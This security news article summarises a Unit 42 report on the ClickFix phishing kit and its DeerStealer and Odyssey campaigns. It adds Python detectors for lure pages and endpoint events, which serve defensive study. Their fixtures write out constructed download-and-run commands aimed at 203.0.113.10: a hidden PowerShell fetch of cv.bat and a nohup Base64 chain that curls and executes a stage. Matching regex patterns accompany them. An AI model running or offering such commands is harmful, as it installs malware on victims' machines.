Researchers from Palo Alto Networks Unit 42 have discovered a new phishing trend where attackers trick victims into manually executing malware on their own devices.
The report exposes a commoditized phishing ecosystem built around an automated tool known as the IUAM ClickFix Generator. This tool makes it simple for threat actors of any skill level to create realistic phishing pages that mimic the browser verification challenges used by web services.
As Unit 42 writes, "Attackers are packaging a highly effective social engineering technique known as ClickFix into easy-to-use phishing kits, making it accessible to a wider range of threat actors. This technique tricks victims into bypassing security measures by manually executing malware, typically information stealers and remote access Trojans (RATs)."
The ClickFix method disguises malicious intent behind what appears to be a normal browser security check. Victims visiting a phishing page are asked to verify that they're human, usually by clicking a button that appears to trigger a CAPTCHA or verification process.
Behind the scenes, the click copies a malicious command to the victim's clipboard. A prompt then instructs them to open a terminal (PowerShell or macOS Terminal), paste the copied command, and execute it "to complete the verification."
This transforms the user into an unwitting participant in their own infection.
Unit 42 found that attackers are now automating the creation of these pages using the IUAM ClickFix Generator, hosted on a server at IP address 38.242.212[.]5. The kit was observed active from July through October 2025, providing a web interface for building customized phishing campaigns.
The report explains: "This tool allows threat actors to create highly customizable phishing pages that mimic the challenge-response behavior of a browser verification page… The spoofed interface is designed to appear legitimate to victims, increasing the effectiveness of the lure."
Threat actors can customize nearly every detail, from the title and message ("Just a moment…") to the command copied to the clipboard and the instructions shown in the fake verification prompt. Advanced options even allow operating system detection, JavaScript obfuscation, and mobile blocking, ensuring victims are guided to desktop environments where the malicious code will execute properly.
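The two traits that set a ClickFix page apart from a genuine verification page are the ones described above: a script that writes to the clipboard, and on-page instructions to paste that clipboard content into a shell or the Run dialog. The following is an added example, not code from the Unit 42 report or from the kit, that scores a page's HTML on those indicators (plus the "human check" wording and the OS-detection gate the generator offers) and compares a constructed lure page against a constructed benign one. Both pages, the indicator weights and the threshold are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed, stripped-down page in the ClickFix style described above. The command
# is a placeholder; the structure (human-check text, clipboard write, paste-into-Run
# instructions, OS gate) is what the detector keys on.
SAMPLE_LURE = """
<html><head><title>Just a moment...</title></head>
<body>
<p>Verify you are human by completing the action below.</p>
<button onclick="verify()">I'm not a robot</button>
<div id="steps" style="display:none">
  <ol><li>Press Win+R</li><li>Press Ctrl+V</li><li>Press Enter to complete verification</li></ol>
</div>
<script>
function verify() {
  var cmd = "powershell -w hidden [CONSTRUCTED PLACEHOLDER, not a real command]";
  if (navigator.userAgent.indexOf("Windows") === -1) { return; }
  navigator.clipboard.writeText(cmd);
  document.getElementById("steps").style.display = "block";
}
</script>
</body></html>
"""

# Constructed benign verification page: same lure wording, but no clipboard write
# and no instructions to paste anything into a shell.
BENIGN_PAGE = """
<html><head><title>Just a moment...</title></head>
<body>
<p>Verify you are human by completing the checkbox below.</p>
<input type="checkbox" id="cb"> <label for="cb">I am human</label>
<form method="post" action="/verify"><button>Continue</button></form>
</body></html>
"""

# Indicator patterns, each with an assumed weight. Clipboard writes and paste-into-shell
# instructions are the two that matter; the rest only add confidence.
INDICATORS = [
    ("clipboard_write", 3, re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)),
    ("shell_paste_instructions", 2, re.compile(r"win\s*\+\s*r|run dialog|powershell|terminal|cmd\.exe|ctrl\s*\+\s*v", re.I)),
    ("human_check_lure", 1, re.compile(r"verify (?:that )?you(?:'re| are) (?:a )?human|i'?m not a robot|just a moment", re.I)),
    ("os_detection", 1, re.compile(r"navigator\.(?:userAgent|platform|userAgentData)", re.I)),
]

@dataclass
class Verdict:
    score: int = 0
    indicators: list = field(default_factory=list)

def score_page(html: str) -> Verdict:
    """Return the weighted score and the list of matched indicator names, in INDICATORS order."""
    verdict = Verdict()
    for name, weight, pattern in INDICATORS:
        if pattern.search(html):
            verdict.score += weight
            verdict.indicators.append(name)
    return verdict

def is_clickfix_like(html: str, threshold: int = 5) -> bool:
    """Flag only when both core indicators are present and the total clears the threshold."""
    v = score_page(html)
    return (v.score >= threshold
            and "clipboard_write" in v.indicators
            and "shell_paste_instructions" in v.indicators)

if __name__ == "__main__":
    for label, page in (("lure", SAMPLE_LURE), ("benign", BENIGN_PAGE)):
        v = score_page(page)
        print(f"{label}: score={v.score} indicators={v.indicators} flagged={is_clickfix_like(page)}")
```

The benign page scores on the lure wording alone and is not flagged, which is the point: "Verify you are human" text is not an indicator by itself. The caveat is the JavaScript obfuscation option the generator offers: once the script is obfuscated, the `navigator.clipboard.writeText` string may not appear literally, so static matching like this belongs alongside runtime observation (loading the page in an instrumented browser and watching for clipboard writes) rather than replacing it.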
Unit 42 researchers identified multiple campaigns built with or inspired by the IUAM ClickFix Generator, each targeting different platforms and distributing distinct malware strains.
Campaign 1: Windows-Only, Delivering DeerStealer

In one case, attackers focused exclusively on Windows systems. "When a victim interacts with the CAPTCHA element by clicking a checkbox to determine whether they are human," Unit 42 explains, "this action triggers a background JavaScript to copy a malicious PowerShell command to their clipboard. Simultaneously, a popover appears, instructing them to open the Windows Run dialog (by pressing Win+R), paste the content from their clipboard and run the command."
When executed, the command downloads a malicious batch script (cv.bat) that installs DeerStealer, an information stealer that harvests credentials and browser data.
The underlying simplicity is what makes ClickFix so effective: it sidesteps traditional email filters and endpoint protections because the payload is executed manually by the victim rather than through automated code exploitation.
Campaign 2: Multi-Platform, Targeting macOS with Odyssey
Another series of phishing campaigns broadened the scope. In this case, attackers configured phishing pages to detect the victim's operating system via JavaScript and deliver different payloads for Windows and macOS users.

Unit 42 noted, "Each version of the phishing page detects the victim's operating system via JavaScript… and delivers a payload accordingly."
For macOS users, the pages delivered Odyssey Infostealer, a malware-as-a-service (MaaS) strain known to steal browser data, cryptocurrency wallets, and system credentials. The malicious command was hidden in Base64-encoded form and executed silently using nohup bash, so that the process keeps running even after the terminal window is closed.
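Because the victim types or pastes the command themselves, the endpoint is where this technique is visible, and the two execution chains described on this page have distinctive shapes: on Windows, a shell launched from the Run dialog (which appears with explorer.exe as its parent) carrying hidden-window, encoded or download-and-run arguments; on macOS, a shell spawned from Terminal that detaches itself with nohup and pipes a Base64 blob through a decoder. The following is an added example, not code from the Unit 42 report, that runs those checks over constructed process-creation events and decodes any Base64 argument so the analyst can see what it fetches. The event schema, host names, the 203.0.113.10 documentation address and the encoded stage are all assumptions.

```python
import base64
import re

# Constructed process-creation events in a simplified schema (field names are
# assumptions, not any vendor's format). The macOS command line embeds a
# Base64-encoded stage, as the campaign above is described to do.
PAYLOAD = "curl -s http://203.0.113.10/stage2 -o /tmp/x && /tmp/x"  # constructed; documentation IP
B64_PAYLOAD = base64.b64encode(PAYLOAD.encode()).decode()

EVENTS = [
    # Run dialog (Win+R) launches show explorer.exe as the parent of the shell
    {"host": "WIN-LAB01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://203.0.113.10/cv.bat -OutFile cv.bat; .\\cv.bat"'},
    {"host": "MAC-LAB01", "parent": "Terminal", "image": "bash",
     "cmdline": f'nohup bash -c "echo {B64_PAYLOAD} | base64 -d | bash" &'},
    # benign: user opened PowerShell from Run with no arguments
    {"host": "WIN-LAB02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
    # benign: ordinary interactive shell use
    {"host": "MAC-LAB02", "parent": "Terminal", "image": "bash",
     "cmdline": "bash -c 'ls -la ~/Projects'"},
]

WIN_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
MAC_SHELLS = {"bash", "sh", "zsh"}
MAC_TERMINALS = {"terminal", "iterm2"}

# Hidden window, encoded command, or in-line download/execute in a shell spawned from the Run dialog
WIN_SUSPICIOUS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
    r"\biwr\b|invoke-webrequest|\biex\b|invoke-expression", re.I)
# Detached execution plus a Base64 decode chain from an interactive terminal
MAC_SUSPICIOUS = re.compile(r"nohup\s+(?:bash|sh|zsh)|base64\s+(?:-d|-D|--decode)", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
REMOTE_FETCH = re.compile(r"\bcurl\b|\bwget\b|https?://|\biwr\b|invoke-webrequest", re.I)

def decode_base64_blobs(cmdline: str) -> list[str]:
    """Decode every Base64-looking token in the command line that yields printable UTF-8 text."""
    decoded = []
    for match in B64_BLOB.finditer(cmdline):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded

def analyze(event: dict) -> list[str]:
    """Return the reasons an event looks like a ClickFix execution; an empty list means not flagged."""
    reasons = []
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    if image in WIN_SHELLS and parent == "explorer.exe" and WIN_SUSPICIOUS.search(cmd):
        reasons.append("shell launched from Run dialog with hidden/encoded/download arguments")
    if image in MAC_SHELLS and parent in MAC_TERMINALS and MAC_SUSPICIOUS.search(cmd):
        reasons.append("terminal shell using nohup and/or a base64 decode chain")
    for text in decode_base64_blobs(cmd):
        if REMOTE_FETCH.search(text):
            reasons.append(f"decoded Base64 stage fetches remote content: {text}")
    return reasons

def triage(events: list[dict]) -> list[tuple[str, list[str]]]:
    """(host, reasons) for every flagged event, in input order."""
    flagged = []
    for event in events:
        reasons = analyze(event)
        if reasons:
            flagged.append((event["host"], reasons))
    return flagged

if __name__ == "__main__":
    for host, reasons in triage(EVENTS):
        print(host)
        for reason in reasons:
            print("  -", reason)
```

To run this against real telemetry, map the three fields onto whatever your source provides (for Sysmon event ID 1 that is ParentImage, Image and CommandLine). The parent-process condition is what keeps the benign events quiet: an administrator's PowerShell session with the same arguments but a different parent is not a Run-dialog paste, and an interactive `ls` from Terminal carries none of the nohup or decode markers.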
The targeted domains for these campaigns included deceptive names like tradingview.connect-app[.]us[.]com, cloudlare-lndex[.]com, and teamsonsoft[.]com, all designed to look like legitimate web infrastructure or trading platforms.
Unit 42 observed that "some pages contained leftover developer comments written in Russian," further hinting at the kit's likely Eastern European origins.
While Unit 42's investigation focused on one primary kit, the researchers discovered numerous related variants in circulation, suggesting that the ClickFix model is rapidly proliferating across cybercrime marketplaces.